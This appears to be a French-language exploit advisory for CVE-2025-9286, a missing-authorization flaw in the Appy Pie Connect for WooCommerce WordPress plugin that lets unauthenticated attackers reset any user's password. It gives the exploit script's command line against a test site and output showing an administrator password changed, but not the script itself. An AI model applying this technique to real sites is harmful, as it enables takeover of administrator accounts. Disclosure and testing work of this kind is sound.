
Appy Pie Connect pour WooCommerce <= 1.1.2 - Absence d'autorisation menant à une escalade de privilèges non authentifiée
Appy Pie Connect pour WooCommerce <= 1.1.2 - Autorisation manquante menant à une élévation de privilèges non authentifiée
Le plugin Appy Pie Connect pour WooCommerce pour WordPress est vulnérable à une élévation de privilèges en raison d'une autorisation manquante dans le gestionnaire REST reset_user_password() dans toutes les versions jusqu'à la version 1.1.2 incluse.
Cela permet à des attaquants non authentifiés de réinitialiser le mot de passe d'utilisateurs arbitraires, y compris les administrateurs, obtenant ainsi un accès administratif.
L'exploit suivant peut être utilisé pour exploiter CVE-2025-9286 sur les sites WordPress exécutant la version vulnérable du plugin.
Nom du script: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Vérification de la version du plugin : http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Plugin vulnérable détecté (1.1.2). Tentative d'exploitation...
[*] Veuillez patienter, tentative de changement du mot de passe...
[+] Exploit réussi ! Le mot de passe a été réinitialisé.
[*] Nouveau mot de passe : Nxploited
[+] Vulnérabilité exploitée et mot de passe changé avec succès.
Cet exploit est destiné exclusivement à des fins éducatives et de tests d'intrusion autorisés.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Par : Khaled Alenazi (Nxploited)